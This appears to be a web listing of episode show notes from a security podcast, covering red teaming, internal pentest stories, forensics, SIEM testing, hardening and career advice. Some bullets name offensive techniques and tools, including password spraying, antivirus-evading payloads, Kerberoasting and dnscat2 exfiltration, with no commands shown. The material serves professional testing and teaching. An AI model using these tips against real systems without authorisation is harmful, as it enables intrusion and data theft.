• My talk at Secure360 went really well. Only slightly #awkward thing is I felt an overwhelming need to change my title slide to talk about the fact that I don't drink.
• The 7MS User Group went really well. We'll resume in the late summer or early fall and do a session on lockpicking!
• Wednesday night my band had the honor of singing at a Minnesota LEMA service and wow...what an honor. To see the sea of officers and their supportive families and loved ones was incredibly powerful.
• MailSniper 's Invoke-DomainHarvestOWA helps you discover the FQDN of your mail server target. Invoke-UsernameHarvestOWA helps you figure out what username scheme your target is using. Invoke-PasswordSprayOWA helps you do a low and slow password spray to hopefully find some creds!
• Once inside the network, CrackMapExec is your friend. You can figure out where your compromised creds are valid across the network with this syntax:

View this episode's show notes for more information

Published: Wednesday, May 15, 2019

This episode is brought to you by ITProTV. Visit https://www.itpro.tv/7minsec for over 65 hours of IT training for free!Yuss! It's true! Dave and Ryan are back!Back in episode #326 we met Ryan...

• Who should have a red team exercise conducted? Who NEEDS one?
• How do you choose an objective that makes sense?
• What do you do about push-back from management and/or scope manipulation? (“Don’t phish our CEO! She’ll click stuff! Attack our servers, just not the production environment!!!”). Spoiler alert: your clients need to have intestinal fortitude!
• What’s better - a “zero knowledge” red team engagement or a collaborative exercise between testers and their clients?
• How do you attack a high-security bunker?!
• How do you conduct a red team exercise without ending up in jail? What does your “get out of jail” card get you - and NOT get you?

View this episode's show notes for more information

Published: Thursday, May 09, 2019

This episode is brought to you by ITProTV. Visit https://www.itpro.tv/7minsec for over 65 hours of IT training for free!Today I take a walk (literally!), get chased by a dog (seriously!) and talk about impostor syndrome and feelings of self-loathing and doubt as I...

• The thrill of getting a presentation accepted at a conference, and the dread and fear that follows
• The awful nightmare I have the night before I speak in front of others
• Shaking off nerves when your talk is accompanied by a sign language interpreter
• Finding your "voice" and getting the confidence to share/present your knowledge in a way only you can
• What are the telltale signs that you should start a security company?
• How do you find business when everybody and their mom seems to have a security offering?
• What are some of the tools/services/people that can help your business succeed?

View this episode's show notes for more information

Published: Friday, May 03, 2019

This episode is brought to you by ITProTV. Visit https://www.itpro.tv/7minsec for over 65 hours of IT training for free!Today we're talking about Logging Made Easy , a project that, as its name implies...makes logging easy! I love...

View this episode's show notes for more information

Published: Thursday, April 25, 2019

This episode of the 7 Minute Security podcast is brought to you by Netwrix. Netwrix Auditor empowers IT pros to detect, investigate and resolve critical issues before they stifle business activity, and proactively identify and mitigate misconfigurations in critical IT systems that could lead to...

• Find your most vulnerable AD abuse paths with BloodHound . For a two-part pentest tale showing how BloodHound can be used/abused by attackers, check out episodes 353 and 354 .
• Get a deep-dive look at your AD machines, users, shares, OS versions and more with Network Detective .
• De-escalate local admins (and prevent them from over-using/abusing the use of their privileged account)
• Although I haven't tested it yet, Logging Made Easy looks like an awesome and free way to get some entry-level logging setup in your environment. Can't wait for a good lab day to play!

View this episode's show notes for more information

Published: Friday, April 19, 2019

This episode is brought to you by ITProTV. Visit https://www.itpro.tv/7minsec for over 65 hours of IT training for free!In this episode I explore some ways you can turn up the security heat on your Windows workstations by mapping their security to a hardening...

• NIST STIG for Windows 10
• Heimdal Security - Windows 10 Hardening Guide
• Center for Internet Security's security benchmarks
• Windows Security Compliance Toolkit (SCT)

View this episode's show notes for more information

Published: Tuesday, April 16, 2019

This episode is brought to you by ITProTV. Visit https://www.itpro.tv/7minsec for over 65 hours of IT training for free!This week we're talking about everybody's favorite topic: REPORT WRITING! Yay! The peasants rejoice! In the last few months I've seen a lot of...

View this episode's show notes for more information

Published: Thursday, April 11, 2019

Today I'm launching an ongoing series called 7MOIST. It stands for:The wildest, craziest, nuttiest part of this series is that each episode will be 7 minutes long!I know, I know! You're saying, "Wait a sec, bub, isn't that why this podcast is called 7 Minute Security in the first place?" And yes,...

• 7
• Minutes
• of
• IT
• and
• Security
• Tips

View this episode's show notes for more information

Published: Wednesday, April 03, 2019

This episode is brought to you by ITProTV. Visit https://www.itpro.tv/7minsec for over 65 hours of IT training for free!In today's episode I talk about some cool tools you can use to start a hard drive forensics investigation more quickly. Resources talked about on...

• Forensics 101 - a talk I did for the 7MS user group in January
• The Digital Forensics Survival Podcast is a FANTASTIC resource to learn more about forensics
• CyLR works great to do quick live disk artifact-gathering on a suspect system, and then...
• CDQR can step in and analyze the info you gathered with CyLR and spit out helpful reports to begin your investigation
• YouTube video of the CyLR/CDQR creators demonstrating the tools and doing a live demo of artifact collection/analysis
• Did you miss this week's mousejacking Webinar ? Also, DIY $500 Pentest Lab - Part 2 is up on YouTube . And we've got a fun Webinar on MITRE ATT&CK coming up in May. Sign up here

View this episode's show notes for more information

Published: Wednesday, March 27, 2019

This episode is brought to you by Netwrix Auditor , which empowers IT pros to detect, investigate and resolve critical issues before they stifle business activity, and proactively identify and mitigate misconfigurations in critical IT systems that could...

• Mousejack.com - great demo video of the attack
• Crazy Radio PA - one hardware option to perform mousejacking attacks
• Custom mousejacking firmware for Crazy Radio PA
• Jackit - tool for conducting mousejack attacks
• A cool Twitter thread on using mousejacking for pentests
• Vulnerable devices - nice repository of devices known to be susceptible to mousejacking attacks

View this episode's show notes for more information

Published: Monday, March 25, 2019

Today's episode is the thrilling, exciting, heart-pounding conclusion of Tales of Internal Pentest Pwnage - Part 1 . In this episode, we cover the final "wins" that got me to Domain Admin status (and beyond!):We also talk about...

• Got DA but can't get to your final "crown jewels" destinations? How about going after the organization's backups (evil grin!)
• Got DA but stuck to find hot leads to where the crown jewels are? Get snoopy and go through people's files, folders and...bookmark caches! (evil grin #2!)
• If your nmap/eyewitness scan turns up Web sites with simply an IIS default landing page or "It works!" Apache page on it, there's probably more there than meets the eye.

View this episode's show notes for more information

Published: Friday, March 22, 2019

Buckle up! This is one of my favorite episodes.Today I'm kicking off a two-part series that walks you through a narrative of a recent internal pentest I worked on. I was able to get to Domain Admin status and see the "crown jewels" data, so I thought this would be a fun and informative narrative...

• Win 10 pro management box with Bitlocker drive encryption and Splashtop (not a sponsor) which I like because it offers 2FA and an additional per-machine password/PIN. I think I spent $100/year for it.
• Kali attack box with an encrypted drive (Kali makes this easy by offering you this option when you first install the OS).
• From the perimeter - where you do a lot of OSINT, phish key users, gain initial access, and then find a path to privilege from there.
• Assume compromise - assume that eventually someone will click a phishing link and give bad guys a foothold on the network, so you have the pentester bring in a Kali box, plug it into the network, and the test begins from that point.

View this episode's show notes for more information

Published: Thursday, March 14, 2019

I recently had the awesome opportunity to take the awesome Real World Red Team course put on by Peter Kim, author of [The Hacker Playbook](https://www.amazon.com/Hacker-Playbook-Practical-Penetration-...

• Doppelganger attacks - does your target have a frequently used site like mail.company.com? Try buying up mailcompany.com with a copy of their email portal (using Social Engineer Toolkit ), and the creds might come pouring in!
• Get potential usable creds from old breaches (Adobe, Ashley Madison, LinkedIn, Spotify)
• Password spraying is often really effective to get you your first set of creds - check out Spray or DomainPasswordSpray
• When creating phishing payloads, Veil will help you craft something to bypass AV
• When you're in a network and have grabbed your first set of creds, run BloodHound or SharpHound to map the Active Directory and find your high-value targets
• Check systems for MS17-010 for some potential easy wins
• Look for potential accounts that you can Kerberoast
• There may be opportunities to hide your payloads in code caves inside of applications that users run
• If you're popping shells, it's probably a good idea to script some of the actions so you can automate some recon and further exploitation
• In the Linux world, it's important to know some good privesc techniques
• It's also helpful to be able to use Tor and proxychains to evade detection
• Exfiltrate data using dnscat2 . I've got a down n' dirty write up on its use here

View this episode's show notes for more information

Published: Wednesday, March 06, 2019

Today's episode is brought to you by NoteCast . Try it free for 60 days (no credit card required) and enter code 7MS when completing your signup.In today's episode, I talk about how the level of Windows server/client logging out of the box is...not really awesome. I then...

View this episode's show notes for more information

Published: Wednesday, February 20, 2019

Today's featured interview is with Lewie Wilkinson, senior integration engineer at Pondurance . Pondurance helps customers improve their security posture by providing a managed threat hunting and response solution, including a 24/7 SOC. Lewie joined me via Skype to talk...

• Fundamentals of threat hunting
• What is threat hunting?
• What are the fundamentals to start mastering?
• How can someone start developing the core skills to get good at it?
• How can sysadmins/network admin, who have a busy enough time already just keeping the digital lights on, handle the mounting pressure to also shoulder security responsibilities as part of their job duties?
• What training/cert options are good to build skills in threat hunting?
• Lets say you know one of your users has clicked something icky and you suspect compromised machine/creds. You pull the machine off the network and rebuild it. How do you know that you've found/limited the extent of the damage?
• Are attackers on networks typically wiping logs on systems as the bounce around laterally?
• Anything to add to the low-hanging hacker fruit list?
• Why is it so critical to not just have logs, but have verbose logs with rich data you need in an investigation?
• When does it make sense to outsource some security responsibilities to a third party?

View this episode's show notes for more information

Published: Thursday, February 14, 2019

Today's featured interview is with Ameesh Divatia , cofounder and CEO at Baffle . Baffle offers an interesting approach to data protection that they call data-centric protection, and the idea is you need to protect information at the record...

• Data privacy - it seems like every 15 minutes there's yet another massive data breach. Why is this continuing to happen?
• What are the basic security/privacy fundamentals that companies should be doing but, for whatever reason, are not?
• GDPR
• What does GDPR mean to the average person?
• Why it was a data privacy wake-up call for so many?
• Have there been any sizable fines issued thus far?
• How can data that companies collect on us be processed in a way that doesn't compromise security?

View this episode's show notes for more information

Published: Wednesday, February 06, 2019

Today's episode is brought to you by my friends at safepass.me . Safepass.me is the most efficient and cost-effective solution to prevent Active Directory users from setting a weak or compromised password. It's in compliance with the latest NIST password guidelines, and is...

• I really dig the Apple family sharing controls, which let you do things like:
• Have the phone "sleep" at certain hours
• Limit the total amount of screen time per day
• Require you to authorize any apps that are downloaded
• We turned on OpenDNS to help filter inappropriate content.
• I also use UniFi access points, which allow you to create a separate wireless SSID with a voucher system enabled on it. That way, you can hand out vouchers to kids with a defined amount of access attached to it (like 1 hour or whatever you like). We use it as a reward once the kids' chores and homework is complete.

View this episode's show notes for more information

Published: Thursday, January 31, 2019

Today's episode is brought to you by my friends at safepass.me . Safepass.me is the most efficient and cost-effective solution to prevent Active Directory users from setting a weak or compromised password. It's in compliance with the latest NIST password guidelines, and is...

• My self-diagnosed job ADHD (check out my series on career guidance for the even longer version :-/)
• The history of 7MS the podcast (inspired by 10 minute podcast and particularly this episode about Arnold the love poet)
• How the podcast helped launch 7MS the business
• The various resources 7MS has worked on to help you in your IT/security career, such as: BPATTY - Brian's Pentesting and Technical Tips for You A Slack channel full of cool security people who want to help you learn, and learn from others as well Vulnerable VMs to help you practice hacking, such as Billy Madison and Tommy Boy Mastering Network Scanning with Kali Linux - a video course I created that's hosted by PacktPub
• BPATTY - Brian's Pentesting and Technical Tips for You
• A Slack channel full of cool security people who want to help you learn, and learn from others as well
• Vulnerable VMs to help you practice hacking, such as Billy Madison and Tommy Boy
• Mastering Network Scanning with Kali Linux - a video course I created that's hosted by PacktPub

View this episode's show notes for more information

Published: Thursday, January 24, 2019

WARNING: Today's episode is a bit of an experiment, and I hope you'll hang in there with me for it.I had the opportunity to do a week-long red team engagement, and so I recorded a little summary of the experience at the end of each day, and then pasted them all together to make today's...

View this episode's show notes for more information

Published: Wednesday, January 16, 2019

Coming up on Tuesday, January 22 I'll be doing a Webinar with Netwrix called [4 Ways Your Organization Can Be Hacked](https://try.netwrix.com/behind_scenes-4_ways_your_organization_can_be_hacked?utm_source=webinars&utm_medium=brian-johnson&utm_campaign=sm-link-behind-scenes-4-ways-your-...

• Would she rather fight 100 duck-sized horses, or 1 horse-sized ducks?
• What basic security effort could orgs address without investing a huge amount of dollars and effort?
• Would she rather be a giant hamster or a tiny rhinoceros?

View this episode's show notes for more information

Published: Wednesday, January 09, 2019

I'd like to coordially invite you to the first-ever 7MS User Group meeting, coming up Monday, January 14th at 6 p.m.! You can attend physically, virtually or both! All the info you need is below...see you there!

View this episode's show notes for more information

Published: Wednesday, January 02, 2019

Psssst! Wanna come to the first ever 7MS User Group meeting? It's coming up on January 14th. You can join in person or virtually! Head here for more information!Dan DeCloss (a.k.a. wh33lhouse on Slack and @PlexTracFTW...

• How to bleed "purple" and get comfortable playing on both the attacking and defending side of the house
• What areas are we failing in defending our networks - and what kind of things can we do make our networks more resilient?!
• What's the biggest challenge you see on both the blue and red team side (spoiler alert: communication is super important!)?
• How do you break into a cyber security position that requires X years of experience when you have zero experience (Dan offers a great tip: don't be intimidated by requirements on job postings...they're often excessive/unreasonable)
• Ways to show security aptitude on your resume without necessarily having a bunch of experience:Build a home labCreate a blogBug bountiesMake a podcastGet certs (or at least get enrolled in them)
• Build a home lab
• Create a blog
• Bug bounties
• Make a podcast
• Get certs (or at least get enrolled in them)
• Some history on PlexTrac and what inspired Dan to create it

View this episode's show notes for more information

Published: Thursday, December 27, 2018

Matt McCullough (a.k.a. Matty McFly on Slack ) joined me in the studio to talk about his wild and crazy path to security. He started literally with no technical experience, but through a lot of hard work, aggressive networking and taking advantage of educational and career...

• How to start an IT career as "the family IT guy"
• Leveraging a higher education (at places like Lake Superior College to meet people of influence and start networking like a beast
• Entry level sysadmin and helpdesk jobs are fun - great opportunities to make the most of the position, build your skills and stretch yourself outside your comfort zone
• MSPs (Managed Service Providers) are another great way to see different clients/verticals/systems and the various requirements that go into supporting them. From there, look for opportunities to start securing those organizations, as many MSPs don't dabble heavily into the security realm.
• If you're going to school for cybersecurity training, look for ways to leverage your status to get discounts on security training, such as with SANS
• Competitions like CCDC are awesome. You're given a handful of servers that are full of vulnerabilities, and you essentially are tasked with defending a network against a professional group of pentesters/redteamers. You even have to deal with real-life "injections" (other random emergencies and mock customers to deal with) while you're in the thick of the battle!
• Join local cyber clubs (or start your own)! Looking for a fun CTF to get started in a group setting? Try hacking the OWASP Juice Shop
• Attend security conferences(or start your own)!
• Looking for a sweet place to go to camp this summer? Try GenCyber and the LSC summer camps - it's cheap and awesome, plus for a limited registration fee you get a ton of training and sometimes free gear!
• Not sure if you're hardcore to try CCDC right now, warm up your skills at the National Cyber League with some CTFs
• Looking for a great cyber group to join that has chapters just about everywhere? Try ISSA !
• BSides are another great place to connect with the security community without the heavier commitment/involvement of some of the larger conferences
• Secure360 is a MN-based security conference that has a student-focused version called Student360
• Getting a cybersecurity education is great. Getting some money off tuition is even better! Be sure to ask at school to see what grants and scholarships might be available to save you a few bucks. Some government scholarship opportunities like Scholarship for Service might even pay for you to go to school full time! Check out the NSF S-STEM scholarship as well.
• Certifications tend to polarize the security community, but I think we can almost all agree that having some is better than none. If you're just getting started, Security+ is a great first notch on your belt, as is CySA . When you get a bit more experience, check out the CISSP as it's stapled to a lot of security job application requirements. If you want to get started in ethical hacking, we've heard the newest version of the CEH is a good place to start. When you're ready for a heftier challenge, try OSCP .
• Build a home lab to play with security tools and techniques! I've covered this before in a podcast series: part 1 , part 2 and part 3

View this episode's show notes for more information

Published: Wednesday, December 19, 2018

Today's episode is brought to you by my friends at safepass.me . Safepass.me is the most efficient and cost-effective solution to prevent Active Directory users from setting a weak or compromised password. It's in compliance with the latest NIST password guidelines, and is...

View this episode's show notes for more information

Published: Thursday, December 13, 2018

Last week I had the fun privilege of speaking twice at the Minnesota Goverment IT Symposium on the following topics:Also, check out the Digital Forensics Survival Podcast which is awesome for learning more about...

• Forensics 101: This was a "reloaded" talk that I started earlier this year (and covered in episode 299 and 300 ). At a high level, the talk covered:Hunting malware with Sysinternals Creating system images with FTKImager Dumping memory with Volatility and ripping icky stuff out of memory images with their 1-2-3 punch articleSeeking out DNS tunneling/exfil using Security Onion
• Hunting malware with Sysinternals
• Creating system images with FTKImager
• Dumping memory with Volatility and ripping icky stuff out of memory images with their 1-2-3 punch article
• Seeking out DNS tunneling/exfil using Security Onion
• Pecha Kucha: this talk, which is in a 20x20 format is part PSA about how to not click bad links, part cautionary tale (and music video!) about how the promise of a free burrito can ruin your business! Check out the video here , and special thanks to Joe Klein for providing the awesome pics to go along with the storyboard - you're a champ.

View this episode's show notes for more information

Published: Thursday, December 06, 2018

On a recent security assessment I was thrown for a loop and given the opportunity to do a two-part physical pentest/SE exercise - with about 5 minutes notice(!). Yes, it had me pooping my pants, but in retrospect it was an amazing experience. This is the mission I was given:Was I successful? Was...

• See if you can get the front desk staff to plug in a USB drive - I posed as John Strand and armed myself with a fake resume. And as I approached the front desk I suddenly panicked and thought, "What if the front desk person is a BHIS fan?!?!?"
• Break into a door with weak security and steal equipment - I was given a plastic shiv and asked to try and get into a secure area in the middle of a busy office morning. No pressure, right?

View this episode's show notes for more information

Published: Wednesday, November 28, 2018

Today's episode talks about some SIEMple tests you can run on your SIEM (OMg see what I did there? I took the word simple and made it SIEMple. Genius stuff, right? And there's no extra charge for it!). And if you're just now starting to shop around for a SIEM, this episode also has an extensive...

• Questionnaire - a series of questions you can ask SIEM vendors to gather as many data points about their products and services as possible
• SIEM tests - a few tests you can conduct on your internal/external network to see if your SIEM solution indeed coughs up alerts

View this episode's show notes for more information

Published: Wednesday, November 21, 2018

Happy Thanksgiving! In this episode I:Hope you can take some time off and enjoy your friends/family this week and weekend. Have a blessed Thanksgiving!.

• Share some things I'm thankful for - like you!
• Talk about a fun episode I'm working on that has some SIEMple tests you can use to test your SIEM (omg see what I did there? So clever)
• Announce the 7MS user's group that will start meeting in the south metro area of Minnesota in January of 2019!
• Tell you a story about a kid that peed his pants in front of me (you're welcome in advance)

View this episode's show notes for more information

Published: Wednesday, November 14, 2018

Welcome to part 6 of our miniseries all about the ups, downs, trials and tribulations of being a small, one-person security start up. In this episode I detail out all the software/services I use to run 7 Minute Security, LLC in hopes it might help you run your company as well! I started a new...

View this episode's show notes for more information

Published: Thursday, November 08, 2018

Today I'm excited to brain-dump a bunch of cool stuff I learned at a red team conference called ArcticCon this week. Although this conference observes the Chatham house rule I'm just going to talk about a few things from...

• When you red team an org, do you usually assume compromise (i.e. plug a Kali box into the network and go from there) or are you crafting email payloads from scratch, trying to get a reverse shell past various email/firewall filtering efforts?
• Does your management seem to "get it" when it comes to the true value of having a red team? Or do they put limits on your efforts - like "Wait a sec, don't phish my boss!" Or "OMG hold on, don't pwn those systems!"

View this episode's show notes for more information

Published: Thursday, November 01, 2018

This week I got to celebrate Halloween with my friends at Netwrix by co-hosting a Webinar called IT Security Horrors That Keep You Up at Night. The content was a modified version of the Blue Team on a Budget talk I've been doing the past year or so, and...

• Phishing
• Abusing bad domain passwords
• Abusing bad local admin passwords
• Responder attack
• Lack of SMB signing
• Get your slides done early! - when co-presenting, it makes sense that they want to see your slides sooner than the day of! :-)
• Don't freak out about an audience of "none" - I always think Webinars are weird because you can't see people's faces or interpret their body language to get a feel for whether they appreciate your humor or understand the points you're trying to make. I learned you just gotta keep pushing forward "blind" whether you like it or not.
• Setup a redundant presentation system - ok so file this one with the irrational fears dept, but I actually had a second laptop ready with my presentation loaded, and the laptop was connected to a cell hotspot I setup on a tablet. That way if my machine BSOD'd or Internet went out in my house, I could quickly rejoin the presentation and pick up where I left off. Safe or psycho? You decide!

View this episode's show notes for more information

Published: Friday, October 26, 2018

This week I was in lovely Boise, Idaho doing some security assessment work. While I was there I got to hang out with Paul Wilch and some of the Project7 crew and picked up a lot of cool tools and tips I share in today's episode:.

• The Badger Infosec group did a cool Rubber Ducky demo.
• Dan from DDSec did a demo of PlexTrac which is "the last cybersecurity reporting tool you will ever need." I'm actually going to use PlexTrac for my next few assessments and am working to line up a future interview with Dan to learn even more.
• Paul gave a demo of Parrot which is cool and Kali-like. However, when Paul and I did a side-by-side test with Kali, we noticed that Parrot kind of barfed when it set out to do an Eyewitness report.
• After meeting Paul's son, Simon, I'm optimistic about the future IT/security leaders in this country. There are some wicked-smart youth out there!
• Paul gave me a hotel keycard lockpick/shiv (his own creation!) and staged a few doors for me to try and bypass. He made it interesting when he promised to throat-punch me if I failed! Here's a picture of the pick (and thankfully, I got off without any throat punches):

View this episode's show notes for more information

Published: Wednesday, October 17, 2018

In this episode I'm releasing a new document aimed to help organizations eliminate low hanging hacker fruit from the environment. The document contains (relatively) cheap and (relatively) easy things to implement. And my hope is it can be a living/breathing document that will bulk up over time....

View this episode's show notes for more information

Published: Wednesday, October 10, 2018

It's done! It's done!! It's DONE!!!That's right mom, my PacktPub course called Mastering Kali Linux Network Scanning is done!In today's episode I:With the holidays coming up, this course is a perfect...

• Recap the course authoring experience
• Explain my super anal retentive editing process that takes 4 hours for every 10 minutes of produced video
• Admit some last minute mistakes that about made me quit the whole project

View this episode's show notes for more information

Published: Wednesday, October 03, 2018

In today's episode, I'm excited to be joined in the studio by Nathan Hunstad , Director of Security at Code42 . Nathan and I had a great chat about Code42's new security offering called [Code42 Forensic File...

• "Does known malware have, or has it ever had, a foothold in our environment?"
• "Has a particular crypto-mining agent been installed on our employees’ computers? Who has it now?"
• "What endpoints have or had copies of our company’s most sensitive files?"
• "What files did an employee download or delete in the months before resigning?"
• "What non-sanctioned collaboration applications are present in our environment?"
• Implementing host-based firewalls - here's a great blog and video on it

View this episode's show notes for more information

Published: Thursday, September 27, 2018

Today's episode is brought to you by my friends at Netwrix. Their amazing Netwrix Auditor tool gives you visibility into what’s happening both on your local network and cloud-based IT systems and tells you about critical changes, and when and where people have been accessing data. Give it a spin...

View this episode's show notes for more information

Published: Wednesday, September 19, 2018

This episode is a cavalcade of fun! Why?First, I've got a big announcement: I've accepted a new position."What?!" exclaimed my mom. "I thought you were president of 7MS, what the what?"No worries, it's business as usual, and my responsibilities at 7MS aren't changing. But I'm also going to start...

View this episode's show notes for more information

Published: Thursday, September 13, 2018

Today's episode is brought to you by my friends at Netwrix. Their amazing Netwrix Auditor tool gives you visibility into what’s happening both on your local network and cloud-based IT systems and tells you about critical changes, and when and where people have been accessing data. Give it a spin...

• What are the security fundamentals companies still aren't getting right?
• How do I properly implement a software firewall?
• How do I not get sued by security product vendors?
• Is there a good way to identify C2 traffic on my network?
• What should I do - and not do - when giving a security Webinar?
• I'm a post-OSCP grad - what else should I take to dive further down the pentest rabbit hole?
• I'm in a network/sysadmin role right now. How can I break into a security-focused role?
• Is there an update out yet for the Active Defense Harbinger Distribution ?
• Kansa - a PowerShell incident response framework
• Implementing host-based firewalls - here's a great blog and video on it
• RITA - Real Intelligence Threat Analytics

View this episode's show notes for more information

Published: Thursday, September 06, 2018

Today's episode is brought to you by my friends at Dashlane, a fantastic password manager for you, your family and your business! Head to www.dashlane.com/7ms and use the code 7MS for 10% off a year of Dashlane Premium (offer does not include Premium Plus)!Today...

• The definition of "red teaming" and where it overlaps, if at all, with pentesting
• Successfully running red team campaigns
• Defending against a red team campaign
• How to climb unclimbable walls
• Is antivirus any good at stopping attackers?
• The importance of 2FA and training your end-users
• How to fool the "This email originated outside your organization" email banners
• How to break into red teaming as a career
• How to successfully break into a casino (or not)
• RedTeam Security's awesome YouTube video on breaking into the US power grid
• If you're a red teamer and in the Twin Cities area (or willing to drive a bit), you definitely want to sign up for ArcticCon coming up on October 23-24 at the Optum World Headquarters. Head to the link and sign up - if there are seats left!

View this episode's show notes for more information

Published: Thursday, August 30, 2018

Today's episode is a follow-up to #304 where we talked about how you can integrate over 500 million weak/breached/leaked passwords form Troy Hunt's [Pwned Passwords](https://www.troyhunt.com/pwned-passwords-v3-is-now-...

• If users update their password to something on the Pwned Passwords list, they'll see the generic "Your password didn't meet policy requirements" message. In other words, the message they'll see is no different than when they pick a password that doesn't meet the default domain policy. So be careful! I'd recommend training the users ahead of pulling the trigger on Pwned Passwords.
• If you want to take, for example, just the top 100 words off of Troy's list and start your implementation off with a small list with:
• As it relates to "hard coding" a machine to point to a specific domain controller, this site has the technique I used. Is there a better way?

View this episode's show notes for more information

Published: Thursday, August 23, 2018

It's been a while so I thought I'd update you on how things are going on the business front. Here are the big updates I want to share with you in today's episode:Lots of goodies to share today!.

• A new 7MS hire that's going to hunt sales opportunities!
• My approach to finding podcast sponsors (it seems to be working)
• Some kick-butt interviews that are on the horizon (including the one and only JOHN STRAND !)

View this episode's show notes for more information

Published: Thursday, August 16, 2018

Today's episode is about a general security awareness session I'm putting together, and it's aimed at helping individuals and businesses not get hacked. To play off the lucky number 7, I'm trying to broil this list down to 7 key things to focus on. Here's my list thus far:Passwords2FA/MFAWifi...

View this episode's show notes for more information

Published: Friday, August 10, 2018

I had an exhilarating and terrifying experience this week doing my first ever live radio interview!As a quick bit of background, this interview was part of the 7MS radio marketing campaign that I've talked about my "How to Succeed in Business Without Really Crying" series (here's part...

View this episode's show notes for more information

Published: Wednesday, August 01, 2018

Today's episode is brought to you by ITProTV. Visit itpro.tv/7ms and use code 7MS to get a FREE 7-day trial and 30% off a monthly membership for the lifetime of your active subscription.Today's episode is a follow-up interview with Joe Klein, who is my good pal, a former...

• How to be an absolute beast at networking
• Seizing new opportunities (even if it seems scary)
• Good certs for security newbs (and not-so-newbs) to pursue
• Life as a SOC analyst
• How to learn security by teaching it!
• 07:21: Interview begins(!)
• 08:00: Recap of what we talked about during Joe's first interview
• 12:42: What kind of skills/certs should someone pursue to get an entry level SOC analyst position? And is SOC analyst the "go to" position infosec newbs?
• 16:00: What can someone new to the infosec community do to network with others if their current LinkedIn network is pretty slim?
• 24:55: What are some good certs to get while I'm waiting to qualify for the CISSP? (This part of the podcast is NOT brought to you by Starbucks, but we wish it was)
• Insert banter about listening to podcasts at 2x
• 29:00: Actually answer the question, "What are some good certs to get while I'm waiting to qualify for the CISSP?"
• 32:00: Rage against tests that don't let you go back to review your answers! And how to be ok with failing certs.
• 37:47: How to successfully prepare for a computerized exam
• 43:29: What's it really like to be on the SOC? Is it just like watching an episode of 24?
• 47:00: Joe spots Rick from Walking Dead on my desk.
• 48:00: Brian reveals a major spoiler about Walking Dead season 9.
• 48:30: Joe scolds Brian for not letting people prepare for the spoiler.
• 49:12: Brian hated Carl, and hoped for seasons and seasons that he would get bit on the face.
• 50:47: Joe notices more toys on Brian's desk.
• 51:08: Brian removes all of Wolverine's limbs.
• 51:40: A commercial for water(?)
• 51:58: Joe thinks Brian should perhaps do voiceovers for theater trailers.
• 52:39: Joe describes what a tier 1 SOC analyst does.
• 55:35: The importance of setting up a home lab to test tools/tricks/scripts/techniques in a safe environment (and the correct pronounciation of the word "dude")
• 58:00: Are the tools a SOC uses totally proprietary / black magic / super secret / don't-ask-don't-tell kind of stuff?
• 1:03:00: What does a tier 2 SOC analyst do in their daily work?
• 1:05:00: Joe talks about his life as an adjunct professor (ok not really...but dude...he teaches impressionible young college minds!)
• 1:06:34: But first...this message from our lovely sponsor, ITProTV
• 1:10:30: Ok now we seriously are going to talk about Joe's life as an adjunct professor.
• 1:11:20: Joe notices Brian is typing on his computer, and he does not appreciate it.
• 1:11:45: Joe and Brian's wives wonder where they are.
• 1:13:00: Joe really, really talks about becoming a teacher
• 1:17:25: Joe breaks Brian's toy Freddy Krueger, and the interview is over, as is their friendship.
• 1:20:00: Joe resumes talking about teaching.
• 1:22:35: Brian gives Joe a chance to redeem himself by allowing him to hold "cord-holding Batman." Brian and Joe do bad Batman imitations.
• 1:23:42: Brian starts to ask a question but both he and Joe start doing bad Arnold impersonations instead.
• 1:25:37: Brian asks if Joe is a better SOC analyst because of his experience in a professorial role.
• 1:28:24: The guys talk about the importance of communication - not only in IT/security, but everything you do.
• 1:32:36: The interview is almost over, but Brian remembers he hasn't engaged Joe in a brand new 7MS studios tradition called "7 Random Questions with 7 Minute Security." (but Brian only has 5 questions prepared. Actually, he only has 4. What an idiot.)
• 1:38:30: Joe and Brian are joined by Mrs. 7 Minute Security!
• 1:41:15: Brian asks Joe the final question of the interview. A question that could change the very course of Joe's life.

View this episode's show notes for more information

Published: Wednesday, July 25, 2018

Today's episode is brought to you by ITProTV. Visit itpro.tv/7ms and use code 7MS to get a FREE 7-day trial and 30% off a monthly membership for the lifetime of your active subscription.This week I sat down with Lane Roush of Arctic Wolf to...

• What in the world is going on in my network?
• How will I know if bad stuff is happening?
• If I do identify the bad stuff and attempt to eradicate it, how will I know if I've exorcised all the demons?
• Why is it so hard to separate the signal from noise when trying to figure out what's happening in the bowels of your network?
• Should logging/alerting be a full-time job for one or more people?
• When does it make sense to outsource these responsibilities?

View this episode's show notes for more information

Published: Friday, July 20, 2018

Today's episode is brought to you by ITProTV. Visit itpro.tv/7ms and use code 7MS to get a FREE 7-day trial and 30% off a monthly membership for the lifetime of your active subscription.In today's episode, I talk about my fun experience using the...

View this episode's show notes for more information

Published: Wednesday, July 11, 2018

Today's episode is brought to you by ITProTV. Visit itpro.tv/7ms and use code 7MS to get a FREE 7-day trial and 30% off a monthly membership for the lifetime of your active subscription.This week's show is another interview episode - this time with my pal Bjorn Kimminich...

• How the Juice Shop came to be
• The current status of application security (is it getting any better?!)
• Common vulnerabilities still found in today's Web apps
• Juice Shop being featured in Google's Summer of Code
• How dev teams can better bake security into their products
• What's next for the Juice Shop (hint: stay tuned after the episode is over for a hint on one new " feature ")

View this episode's show notes for more information

Published: Thursday, July 05, 2018

Today's interview features Justin McCarthy, CTO and cofounder of StrongDM , which offers both commercial and open source tools (like Comply ) to help customers with SOC compliance.Justin schooled me (in a nice way) about a lot of...

• What SOC and the various SOC types are all about
• What SOC compliance costs
• What to look for in selecting a good auditor
• Tools that can help companies make SOC compliance efforts go more smoothly

View this episode's show notes for more information

Published: Thursday, June 28, 2018

In this episode I wanted to give you some cool/fun updates as it relates to 7MS the business! Specifically:.

• A new member of the 7MS team (kinda!)
• The weird and varied projects I'm working on
• Upcoming podcast sponsors (probably in July)
• 7MS has a "real" office coming soon to the southern metro of MN (hopefully!)

View this episode's show notes for more information

Published: Thursday, June 21, 2018

As a continuation of last week's episode I'm now making a bit of progress in finding a good backup solution that protects USB backups both at rest and when pumped up to the cloud.I mentioned I've been using BackBlaze...

View this episode's show notes for more information

Published: Wednesday, June 13, 2018

You probably create DR plans for your business (or help other companies build them), but have you thought about creating one for yourself? Yeah, I know it's grim to think about "What will my loved ones do to get into my accounts, backups, photos, social media accounts..." but it's probably not a...

• A "here's how I run all our technology" Google doc with domains I have registered, their expiration date, what their function is, etc.
• A how-to guide on restoring data from our online backup solution
• Implementation of a password manager

View this episode's show notes for more information